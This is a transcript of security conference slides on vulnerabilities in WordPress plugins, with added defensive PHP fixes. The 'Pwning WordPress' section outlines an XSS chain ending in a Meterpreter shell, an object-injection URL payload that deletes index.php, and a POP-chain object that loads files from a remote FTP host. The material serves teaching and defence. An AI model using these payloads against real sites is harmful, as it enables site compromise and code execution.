The State of Security of WordPress (Plugins) / Summer of Pwnage
TRANSCRIPT
Yorick Koster
Contents
• About Me
• Summer of Pwnage
• State of Security
• Pwning WordPress
About Me
• Yorick Koster
• Co-Founder Securify – Proactive Software Security / Build Security In
• ~15 years doing software security
• Uncovered vulnerabilities in various products
– Internet Explorer, Office, .NET Framework, Adobe Reader, WordPress & more.
Summer of Pwnage
• Started as joke
• Used GitHub to find Object Injection
• We didn't know how to run a con (still don't 😉)
Summer of Pwnage
• Month of WordPress hacking
• Meetup every week
• VM with WordPress & ~1000 plugins/themes
• For students & people with little experience
• ~25-30 active participants
• Resulted in 118 findings (5 Core)
https://www.sumofpwn.nl/advisories.html
https://twitter.com/sumofpwn
Summer of Pwnage: Results
• Cross-Site Scripting 66%
• Cross-Site Request Forgery 12%
• PHP Object Injection 8%
• Other 14%:
– (Remote) Code Execution 4%
– Local File Inclusion 3%
– Denial of Service 3%
– Authentication Bypass 2%
– Misc 2%
Summer of XSS 😎
Summer of Pwnage: Results
[Pie chart: 65%, 23%, 12%; legend: CSRF, Pre-auth, Privilege escalation]
Summer of Pwnage: Results
[Bar chart, 0–80 findings per status: Fixed, Open, No fix]
Summer of Pwnage: Media coverage
42
Summer of Pwnage: Observations
• Focus on low hanging fruit
• Grep is king
• Getting stuff fixed is hard
• Security knowledge of plugin writers is low
WordPress (Plugins)
State of Security
WordPress Security: Core
• WordPress is blog software with CMS features
• Powers ~27% of all websites (reportedly)
• Focus on who can edit which content
– Content is either published or not*
– Media can be enumerated*
WordPress Security: Core
• Seems like they've learned the hard way
• Core is relatively secure (they appear to know their stuff)
– Filtering/validation
– Anti-CSRF (nonces)
– Automatic updates 🙂
• (Legacy) issues
– No prepared statements
– Salted MD5 passwords
– Login brute force
– Not designed for CSP
WordPress Security: Plugins
• Vulnerabilities in only ~100 plugins of 1000 popular plugins (10%)
• Keep in mind:
– Limited (spare) time
– Focus on low hanging fruit
WordPress Security: Plugins
• Some APIs are secure by default
– E.g., prevent SQLi
• Some are not
– Output encoding
– CSRF protection
• High number of XSS & CSRF issues
get_post( int|WP_Post|null $post = null, string $output = OBJECT, string $filter = 'raw' )
Retrieves post data given a post ID or post object.
function column_default($item, $column_name) {
    $item = apply_filters('ull-output-data', $item);
    // unset existing filter and pagination (computed but not used in this fragment)
    $args = wp_parse_args( parse_url($_SERVER["REQUEST_URI"], PHP_URL_QUERY) );
    unset($args['filter']);
    unset($args['paged']);
    switch ($column_name) {
        case 'id':
        case 'uid':
        case 'time':
        case 'data':
            // returned as stored, without output encoding
            return $item[$column_name];
        case 'image':
            $user = new WP_User( $item['uid'] );
            $user_email = $user->user_email;
            return get_avatar( $user_email, 60 );
        case 'user_email':
            // returned as stored, without output encoding
            return $item[$column_name];
        case 'ip':
            // returned as stored, without output encoding
            return $item[$column_name];
    }
}
WordPress Security: Plugins (XSS)
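The column_default() above returns logged values (user data, e-mail, IP) straight into the admin listing table, and nothing in WordPress encodes them on the way out. As an added example that is not part of the talk or of the plugin shown, here is the same method with every string passed through WordPress's escaping API; the esc_html()/get_avatar() stand-ins exist only so the script also runs outside WordPress, and the sample row is constructed.

```php
<?php
// Added example, not the plugin's own code. Stand-ins so the file runs
// without WordPress; inside a plugin the real functions are already defined.
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('get_avatar')) {
    // Stand-in: the real get_avatar() escapes its own output.
    function get_avatar($email, $size) { return '<img alt="" src="about:blank" width="' . (int) $size . '">'; }
}

function column_default_safe(array $item, $column_name) {
    switch ($column_name) {
        case 'id':
        case 'uid':
            // Numeric columns: a cast already removes anything dangerous.
            return (string) (int) $item[$column_name];
        case 'time':
        case 'data':
        case 'user_email':
        case 'ip':
            // Attacker-controlled strings (a logged User-Agent, a spoofed
            // X-Forwarded-For) are HTML-encoded before reaching the admin page.
            return esc_html($item[$column_name]);
        case 'image':
            return get_avatar($item['user_email'], 60);
        default:
            // Unknown column: render nothing rather than a raw array value.
            return '';
    }
}

// Constructed sample row, as a logging plugin might have stored it.
$row = array(
    'id' => 7, 'uid' => 1, 'time' => '2016-09-30 10:00:00',
    'data' => '<script>alert(1)</script>',
    'user_email' => 'admin@example.test',
    'ip' => '"><img src=x onerror=alert(1)>',
);
foreach (array('id', 'time', 'data', 'user_email', 'ip') as $col) {
    $html = column_default_safe($row, $col);
    // Self-check: no HTML metacharacter may survive in a text column.
    if (strpbrk($html, '<>"\'') !== false) {
        throw new RuntimeException("unescaped output in column $col");
    }
    echo $col, ': ', $html, "\n";
}
```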
WordPress Security: Plugins
"We're sorry for the inconvenience, we will fix this right away."
"We will need to have access to your ftp information so we can login and look into this, can you please provide us with login credentials?"
"Is there a reason a WordPress nonce isn't sufficient for this security concern?"
"Can you at least explain me the damage it could create?"
"Can you help me understand why json_encode/json_decode is superior to using serialize/unserialize?"
"[…] is called by a WordPress add_menu_page, in theory it is WordPress that has filter the input when calling the page."
WordPress Security: Summary
• WordPress Core is relatively secure
• Core has known (legacy) issues
• Lots of insecure plugins
– Dangerous APIs
– Low security awareness
– Mostly XSS & CSRF
Pwning WordPress
Pwning WordPress: Cross-Site Scripting
• Inject XSS payload
• Wait for admin to visit vulnerable page
• Run 2nd stage JavaScript payload to:
– modify PHP file;
– visit PHP file;
– run PHP Meterpreter client.
Pwning WordPress: Hardening
• If you don't need the editor, disable it
• More hardening:
https://codex.wordpress.org/Hardening_WordPress
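The second stage above only works because a logged-in administrator can write PHP through the dashboard's theme and plugin editor. As an added example, not from the talk, these are the wp-config.php settings that remove that capability; DISALLOW_FILE_EDIT is the one the slide refers to, DISALLOW_FILE_MODS goes one step further.

```php
<?php
// Added example, not the talk's code: wp-config.php hardening.

// Removes Appearance > Editor and Plugins > Editor. A hijacked admin session
// (e.g. via stored XSS) can then no longer write PHP files from the dashboard.
define( 'DISALLOW_FILE_EDIT', true );

// Stronger: also blocks installing and updating plugins/themes from the
// dashboard, so code changes only happen through your own deployment path.
// Caveat: this also switches off WordPress's automatic updater, which the talk
// counts as one of Core's strengths, so only set it if updates are applied
// some other way.
define( 'DISALLOW_FILE_MODS', true );
```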
Pwning WordPress: PHP Object Injection
<?php
class Example1 {
    public $cache_file;

    function __construct() {
        // some PHP code...
    }

    function __destruct() {
        $file = "/var/www/cache/tmp/{$this->cache_file}";
        if (file_exists($file)) @unlink($file);
    }
}

// some PHP code...
$user_data = unserialize($_GET['data']);
// some PHP code...
?>

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}
OWASP example
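The root cause in the OWASP example is that unserialize() instantiates whatever class the input names, so the attacker chooses which __destruct() runs. As an added example that is not from the talk, the script below shows the two fixes (and answers the plugin author's json_decode question above): on PHP 7.0+ unserialize() can be told to instantiate no classes at all, and JSON has no way to name a class in the first place. The class is a harmless variant of Example1 that only counts destructor calls, and the payload is the one from the slide.

```php
<?php
// Added example, not from the talk. Requires PHP 7.0+ for allowed_classes.
class Example1 {
    public $cache_file;
    public static $destructed = 0;
    function __destruct() {
        // In the vulnerable original this is where @unlink() happens.
        self::$destructed++;
    }
}

// Constructed input: the payload string from the OWASP example.
$payload = 'O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}';

// Fix 1: refuse to instantiate classes. The result is a
// __PHP_Incomplete_Class, which has no __destruct() of its own.
function safe_unserialize($data) {
    return unserialize($data, array('allowed_classes' => false));
}

// Fix 2: do not use the PHP serialization format for untrusted data at all.
// JSON carries only scalars, arrays and objects, never "instantiate class X".
function decode_user_data($json) {
    $data = json_decode($json, true, 16);
    // Malformed input (including PHP-serialized text) decodes to null: treat
    // it as empty instead of falling back to unserialize().
    return is_array($data) ? $data : array();
}

$obj = safe_unserialize($payload);
if (!($obj instanceof __PHP_Incomplete_Class)) {
    throw new RuntimeException('unserialize() instantiated a real class');
}
unset($obj);
if (Example1::$destructed !== 0) {
    throw new RuntimeException('Example1::__destruct() ran on attacker input');
}

if (decode_user_data($payload) !== array()) {
    throw new RuntimeException('serialized payload should not decode as JSON');
}
$data = decode_user_data('{"cache_file":"report.html"}');
if (!is_array($data) || $data['cache_file'] !== 'report.html') {
    throw new RuntimeException('JSON input did not decode to a plain array');
}
echo "both fixes hold: no object instantiated, no destructor run\n";
```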
Pwning WordPress: PHP Object Injection
• Find the right target
• Direct:
– __destruct()
– __wakeup()
• Indirect:
– __toString()
– __call()
– __set()
– __get()
• Autoloading:
– spl_autoload_register()
Pwning WordPress: PHP Object Injection
• No easily exploitable class in WordPress
• Find the correct POP chain
• POP chain presented by Sam Thomas
http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing
• Attack still works in latest version (4.6.1)
• Uses WP_Theme::__toString() as start point
Pwning WordPress: PHP Object Injection
WP_Theme: __toString() → display() → load_textdomain() → load_theme_textdomain()
l10n.php: load_textdomain() → is_readable() → import MO file
Pwning WordPress: PHP Object Injection
• Final object
WP_Theme Object
(
    [theme_root:WP_Theme:private] => ftp://anonymous:[email protected]
    [headers:WP_Theme:private] => Array
        (
            [Name] => foo
            [TextDomain] => default
        )
    [stylesheet:WP_Theme:private] => foobar
)
Questions?
[email protected] / @yorickkoster / @securifybv